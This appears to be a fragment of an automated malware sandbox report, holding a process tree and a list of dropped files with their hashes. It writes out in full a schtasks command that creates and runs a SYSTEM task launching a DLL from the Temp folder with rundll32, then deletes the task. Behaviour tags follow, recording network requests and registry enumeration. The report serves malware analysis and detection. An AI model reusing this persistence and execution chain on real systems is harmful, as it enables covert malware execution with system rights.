PID:2448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qOGoknXFjgYYIAZcs" /SC once /ST 06:59:33 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UnkSsAUmPJldPerG\thKAOuCt\zzVgJWv.dll\",#1 /WndidWMm 385137" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qOGoknXFjgYYIAZcs"2⤵PID:4108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NDvladDJhDVrRoudV"2⤵PID:2252
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 20242⤵
- Program crash
PID:4388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2296 -ip 22961⤵PID:3488
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UnkSsAUmPJldPerG\thKAOuCt\zzVgJWv.dll",#1 /WndidWMm 3851371⤵PID:2536
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UnkSsAUmPJldPerG\thKAOuCt\zzVgJWv.dll",#1 /WndidWMm 3851372⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1160 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qOGoknXFjgYYIAZcs"3⤵PID:3316
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3520 -ip 35201⤵PID:2392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1544 -ip 15441⤵PID:4884
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5e7a1d695b7cb897273c2b3b42cbc25d6
SHA16165df89ca12cd89d20ef5a7044806f691eb530b
SHA25623c7180603549c5e9602e3ed3e0f428a53983f7211582424b215073097d35620
SHA512d68c03a39afaeb69e249d4dcaa7c71607a04afac764bfd676f68d370801dab3124893ee0468db01d632412c4900a7ba5614f5745f87a5f6438052fe04f5687fb
-
Filesize
2KB
MD537702780428fc1fbff9be809e15598a4
SHA12d873db7db522861761ca8ab216eebe3d2a98806
SHA25603f2fb3e56866662b1c81edf1397a6b9f8b30aad83fb5e17efe52d95690bafd3
SHA512325460f808f5b39ec722f5b7907ceb8c70768b28b2f85a35f491850618506899714f62cf5a4fcafb48f25df36174c9a7b43cb04785fe37d643504deb61b9604e
-
Filesize
2KB
MD5b20ba0867755d7b574a571e54f56215a
SHA18c5e2fe20b936eff9ab49a8c96a2f43c16ea2b7b
SHA25694770d36e4e214f4e85f6ecccc1d0fb63dc2b18e699c8dc48f6f6ebf4015d747
SHA5122571bfe1144ec68f099fde311447179da295939c7adfe1610ad6236a6a74922a94bb09f43943e6972a287d2310ad8895bf000a480e07ba4d0b44b68f0357d238
-
Filesize
2KB
MD5c467417f861fc27bf5635a0ad514885b
SHA1589b534e082fca766299154082734157703f0466
SHA25688c033247da7a649859beda185cc9e72e13ba068e1552b17cf108f7ece0ccb77
SHA5124d229a79f8accaf788aaeafe0c499b4dfca9ac7cac3260d62d0e006ed703b9f21f4d0f5a6f47213820a96d0460f6ad9ad26ecccf6aa1bca3c555778fca638853
-
Filesize
2.0MB
MD5e7a11eb70aa76d771e0bae6a0d252506
SHA1efabbf31c12cd9041a36138e10b6c6855806aa98
SHA256dd38a117057f6bce110fdf97661aab32944defafd0813f5f4ce537b1d98441ec
SHA5127ee2773948d2d0a7314803385f6cccb4d9400457c4f5ee6e04be31340ea3107040be7125e86472ee67ecfd79f2ef4954946ef164ef4e44b83935f2b4e6d63618
-
Filesize
2KB
MD5133253dba065a7a9776562254e6f4402
SHA1d574b5848de1ea988a1d2b28a8fd13cf5896e186
SHA2569606c3a4b1f618ae5107fcb3995acae712f639e2bca17da8f2737fb09bc2dc88
SHA512e873c96ae26e7c08d49a357901df17534ae5b011ea88ecf4a2b810cf68e524c188124c59fc534d945ae7b83331df568db49a9d81afa3faf420f3022fe25a9027
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
11KB
MD5aab7ff6beb203f1700dfbb1217cc1343
SHA16971c20864ec2ba95bb47bd4ebdb4848aca6b8a0
SHA256e4f3c8a2dd11241afe59e10fe7c16d13889a911c8920ced5ee073889407db682
SHA51216a882b3b41d6e20ab2b5aa30c4f9c1078929c3eace571d09faca7aaf45a62b8f2999c184bcf09888ef8c909ab243980cfff9146f589dba832885644e3ddf056
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD524ee1ac98458ae21771d0995d44afa6d
SHA117ec2753136c5a1989ed3a8b8d6ea69dc12a67be
SHA256cf27f69fced3a9edc8ddfd61ae24b0cddf197204bb6f9ab604103c0a6ea97d25
SHA512537561c7d05558feeb83d41306777c1d15e00630d88a3a70e5b75e9c5e276014b1409c731b21c26c6c0abafe12d6bc04ac417990896ff4462aed5d1525aa3532
-
Filesize
6.4MB
MD59aacd3c6118b342488554bcdfac1ed45
SHA1aaf45e2d8e3d833a4dba007abb668bb37a0ae05b
SHA25693d9189aaffc787c0ae2e5d2a541fa8851b31de8ead7426ce7e498671c0b8487
SHA512661f22f4512fdc9365cf7a34e2a4afcd4b9dc71ecdc393ee735e34745381cc5e78c355458bfcc8e9a12bb9d08735da287a6341b017283282357ff128c5d6d9ea
-
Filesize
6.7MB
MD54e81ccb99ab43afcc530be391250fa8c
SHA14e24a959af2cae6385338123a45a5b78ee78088c
SHA2562880c6c6f2109f95d39a827f4f265842e108c7b6124af685052940e0bec7f754
SHA512f0937814bcd987e85c16f32add008b8c888f9ec036833f503371abd6bbd4b3533a88ba5ed1bd2052dac4b6be6d6477c1a80c886dcee8c201ba4bb12d3a28691f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD51844ca41e20c03c5f0cffd04b61331d7
SHA1f5afd966af3bfe75c407e37090fab7c54f78b1e1
SHA2561115f8ee7b3ef7472cb158bcb9a942e69c00bc25c8a6713d988cafc45c3945f7
SHA5123daa7109eb78bf74122c0b1df5ca3ea26e569f94370c9101a68c8e60933f7048ddc548db36c4a2c5a5d6d324d149857fb0f910004cb1ff68dd7abe1722f7b4e9
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD5aebf4bf6752c28a76f012ad901a1b27e
SHA19609832f721f53d59f2d01b9d740649f44f965ea
SHA25673316c4c39ce34c44aa26ba504def77616d56f1d7e4a4330ce67a3719ba7b7b4
SHA512dbf3b971ddcb84a3f5c6b76515a6d9f782fd34d109133cf3b1760596ca1b5bf92e6dd11947b430bba77cfc2ef93f8978d90aaba571d7e299a04e01c96428af50
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD54683bc1bed9fec09960496076aa391ad
SHA15493f24e69328345c462cfd9fb440b46ac4c9d50
SHA256b9d99427ca27fdcef33ef7878fae4bce897cfef21a894b635b6c226c9dc8017e
SHA51298be6056b06ea23099d9f6f5a26ca639d8ccfba967c033e5410c3a85e384256643dc6aea916c987ee1698efe64cb1f6463751d81d84452c7a0f7802f7e3c190f
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5c8f73d6859ab3cc874b75459894b0fdc
SHA1f872945e3ee5582bf74aa1709070fc81da1c7178
SHA2568ac4de0c87a3a14adfc6fa1ff9bbd2913ea4d2eee6d75e098d90fe882aed705e
SHA512166a426a1ba28be65def754df93a338cdbadc61cab3c2f5be532814d4bc3f832c455cb490c9abe9ee12798ce5d9dda2041e2830d71c17a9d9939df09e53bec60
-
Filesize
6.5MB
MD50289d22df1ba2617a18dcf81be4e9ea4
SHA1f7c7a5961181693e81716d2b3a58f1687e564fbd
SHA256e6a814f962c7b1ac003fe7e933e2b110ba521226a3299abbd8474560063ae3ba
SHA51272b601cf2baffca7b52f995f27c67debc8e6b04755fbfa478251a1b7b5b63f94f9f94d8cb770c7cae859ad58f93f3ad20d55979c6d0db9439d35e0555cd94afd
-
Filesize
6KB
MD5ada7457e483f19c0de8a9a43f1ec1efb
SHA1ceab7c68ec18c38b631ad62ba3e3bd89c2e13942
SHA2568ff5678ab14f8f375abfd13e68b292766b3316e079f10d90116e77ea8c59489d
SHA512fd5b26a9b27a017251dc163832e0609949ddc7b6d5d380fcc03744f5d2cdf4d507419f3503ffd1faa17033bc26a145f591b0054f348ff8d3e7e77d5f21e0fb03